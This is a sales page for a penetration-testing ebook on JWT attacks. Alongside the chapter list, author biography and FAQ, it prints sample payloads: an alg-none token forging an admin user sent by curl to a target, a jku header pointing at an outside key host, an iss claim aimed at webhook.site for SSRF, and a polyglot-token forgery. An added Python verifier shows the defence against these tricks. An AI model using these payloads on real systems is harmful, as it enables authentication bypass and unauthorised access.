Broken Token Series — Book 1
Original Research — Not Found Anywhere Else

BROKEN TOKEN: JWT

Know every way to break a JWT. Every technique, every payload, tested and ready. Algorithm confusion, header field injection, claim manipulation, format attacks — including original research not documented in any public resource.

$19 (was $29, save $10)
30-day money-back guarantee  ·  PDF format  ·  Instant download
40 pages  ·  7 chapters  ·  47 techniques  ·  20 CVEs covered
Taste the Content

REAL PAYLOADS. REAL TECHNIQUES.

Every technique comes with framework context, CVEs, and a ready-to-use command. No theory without payload.

Chapter 3 — Algorithm Attacks
NoAlg Bypass — strip the signature entirely

TOKEN=$(echo -n '{"sub":"admin"}' | base64 | tr -d '=' \
  | xargs -I{} echo "eyJhbGciOiJub25lIn0.{}.")
curl -H "Authorization: Bearer $TOKEN" \
  https://target.com/api/endpoint

Chapter 4 — External Key Injection
jku Injection — server fetches your public key

import base64, json

def b64url(text):
    # base64url without padding, as the JWS compact form requires
    return base64.urlsafe_b64encode(text.encode()).rstrip(b'=').decode()

header = b64url(json.dumps({
    'alg': 'RS256',
    'jku': 'https://hit.brutelogic.net/jwks.json',
    'kid': '1'
}, separators=(',', ':')))

Chapter 6 — Claim Manipulation
iss URL Injection — SSRF via OIDC discovery

echo -n '{"sub":"admin","iss":"https://webhook.site/YOUR-ID"}' \
  | base64 | tr -d '=' \
  | xargs -I{} echo "eyJhbGciOiJub25lIn0.{}."

Chapter 7 — Format Attacks
Polyglot Token — forged claims, valid signature

TOKEN="<original token>"
AAAA=$(echo $TOKEN | cut -d'.' -f1)
BBBB=$(echo $TOKEN | cut -d'.' -f2)
CCCC=$(echo $TOKEN | cut -d'.' -f3)
XXXX=$(echo -n '{"sub":"admin","role":"admin"}' \
  | base64 | tr -d '=')
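The defender's counterpart to the header tricks sampled above (alg none, whitespace and array-wrapped alg values, jku/jwk/x5u key injection, kid lookups): an added Python verifier that is not code from the book or its author. It pins the algorithm server-side, refuses any header that points at remote or embedded key material, and treats kid purely as a dictionary key; the key ids and HMAC secret are constructed demo values.

```python
import base64
import hashlib
import hmac
import json

# Constructed demo keys (an assumption); a real server loads them from a secret store.
KEYS = {"2024-01": b"demo-hs256-key-not-for-production"}
DEFAULT_KID = "2024-01"
ALLOWED_ALGS = {"HS256"}  # chosen by the server, never read from the token
UNSAFE_HEADERS = {"jku", "jwk", "x5u", "x5c", "x5t", "x5t#S256"}

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def mint(claims: dict, kid: str = DEFAULT_KID) -> str:
    # Issuer side: HS256 over header.payload; kid names a server-held key.
    h = b64url_encode(json.dumps({"alg": "HS256", "kid": kid}, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(KEYS[kid], f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(sig)}"

def verify(token: str):
    # Verifier side: returns (ok, reason, claims); claims is None on rejection.
    try:  # ValueError covers a wrong segment count and bad base64url/UTF-8/JSON
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
        claims, sig = json.loads(b64url_decode(p)), b64url_decode(s)
    except ValueError:
        return False, "malformed token", None
    if not isinstance(header, dict) or not isinstance(claims, dict):
        return False, "header and payload must be JSON objects", None
    # Exact allowlist match rejects "none", " none", ["HS256"] (array wrapping) and
    # RS256->HS256 confusion, because the key is looked up by kid, never by alg.
    alg = header.get("alg")
    if not isinstance(alg, str) or alg not in ALLOWED_ALGS:
        return False, f"alg {alg!r} rejected", None
    present = UNSAFE_HEADERS.intersection(header)
    if present:
        return False, f"key-source headers not honoured: {sorted(present)}", None
    # kid is only a dictionary lookup, never a file path or URL.
    kid = header.get("kid", DEFAULT_KID)
    key = KEYS.get(kid) if isinstance(kid, str) else None
    if key is None:
        return False, "unknown kid", None
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return False, "signature mismatch", None
    return True, "ok", claims
```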
Table of Contents

ALL 7 CHAPTERS

Each chapter follows the same structure: framework behavior, CVEs, attack primitives, detection.

CH 01  Introduction (2 pages)
       What JWTs are, why they break, how to use this book
CH 02  JWT Fundamentals (3 pages)
       Header fields, registered claims, custom claims by framework, signing algorithms
CH 03  Algorithm Attacks (5 pages)
       NoAlg, alg confusion, ECDSA blank signature, whitespace bypass, array wrapping
CH 04  External Key Injection (6 pages)
       kid path traversal, kid URL injection, jku, x5u — server fetches attacker-controlled key
CH 05  Embedded Key Injection (5 pages)
       jwk, x5c, x5t+x5c — key material inside the token, no infrastructure needed
CH 06  Claim Manipulation (8 pages)
       iss, aud, jti attacks — SSRF, SQL injection, broken authentication, claim enumeration
CH 07  Format Attacks (6 pages)
       Polyglot token, sign/encrypt confusion — the format itself as the attack surface
APX    Appendix — DIY Infrastructure (3 pages)
       Keypair generation, jwks.json, cert.pem, hosting, webhook.site for SSRF confirmation
Coverage

EVERY ATTACK LAYER

From the algorithm field to the token format itself — every layer where JWT security breaks.

01  Original Research
    kid URL injection, iss→SSRF via OIDC discovery, jti SQL injection structural backing — techniques not found in any public tool, writeup, or existing resource.
02  Algorithm Attacks
    NoAlg bypass, RS256→HS256 confusion, ECDSA blank signature, whitespace regex bypass, array wrapping. 7 CVEs documented.
03  External Key Injection
    kid path traversal, kid URL injection, jku injection, x5u injection. Server fetches your key — auth bypass and SSRF simultaneously.
04  Embedded Key Injection
    jwk, x5c, x5t+x5c combined. Key material travels inside the token — no remote infrastructure needed.
05  Claim Manipulation
    iss spoofing, SSRF via OIDC discovery, aud bypass, jti SQL injection, cross-service relay, claim enumeration by framework.
06  Format Attacks
    Polyglot token (CVE-2022-39227) — valid signature, forged claims. Sign/encrypt confusion — public key encrypts, no signing needed.
Series

EXPAND YOUR ARSENAL

Four independent books. Each covers a distinct token type and attack surface. No reading order required.

BOOK 01  JWT (available now)
         Algorithm attacks, key injection, claim manipulation, format attacks.
BOOK 02  OAuth (coming soon)
         redirect_uri bypass, PKCE downgrade, token leakage, cross-tenant hijacking.
BOOK 03  OIDC (coming soon)
         iss injection, nonce bypass, mix-up attacks, UserInfo manipulation.
BOOK 04  SAML (coming soon)
         XML signature wrapping, XXE, parser differential attacks, SSO bypass.
Author
Rodolfo Assis (Brute Logic, @BRuteLogic)
15+ years  ·  1,461 reports  ·  KNOXSS creator  ·  Brute One  ·  BSides Boston 2016  ·  DEF CON 25  ·  Ekoparty 2025  ·  Top 200 Influencer 2021  ·  4 ebooks  ·  64K+ followers

Brazilian offensive security researcher with 15+ years breaking web applications. Creator of KNOXSS — the most comprehensive automated XSS service, live since 2016 — and X55.is, a universal XSS delivery domain. Founder of Brute One, an AI assistant for bug bounty hunting with tool execution capabilities and proprietary offensive knowledge.

Author of the following offensive security ebooks: First Bounty, The Brute Art of Bypass, SSRF Mastery Series — Fundamentals, and now Broken Token: JWT. Writing Security in Collapse, a cyberpunk doctrine for the Intelligence Age. Building the King of Noobs recon suite on GitHub — reKover, unKover, disKover.

Spoke at BSides Boston 2016, DEF CON 25, and Ekoparty 2025. Ranked #1 globally on Open Bug Bounty in 2015 with 1,461 reports. 1,000+ vulnerabilities disclosed against Oracle, Apple, Microsoft, Samsung, Slack, Uber, LinkedIn and others. Published the XSS Cheat Sheet series (2018–2024). Listed among 200 Global Cybersecurity Influencers by Check Point (2021). 64K+ followers @BRuteLogic.

FAQ

QUESTIONS

Who is this for?
Intermediate to advanced bug bounty hunters and pentesters who already know what a JWT is and want to know every way to break one. Not a beginner guide.
How is this different from what's already out there?
Existing resources cover the same surface-level techniques and stop there. This book documents the structural reason behind each attack, maps each technique to a classical vulnerability class — SSRF, SQL injection, broken authentication — and includes original techniques not found in any public resource or tool.
Do the commands actually work?
Yes. Every command was tested on Ubuntu 24 before inclusion. No placeholder code, no theoretical payloads.
Get the book

STOP FINDING THE SAME BUGS EVERYONE ELSE FINDS.

The techniques your competition doesn't know. 38 pages. 47 techniques. Original research. Tested payloads.

PDF format  ·  Instant download  ·  30-day money-back guarantee
AI-assisted creation, thoroughly reviewed by the author. All technical content tested for accuracy.
Errors or suggestions: assis@brutelogic.net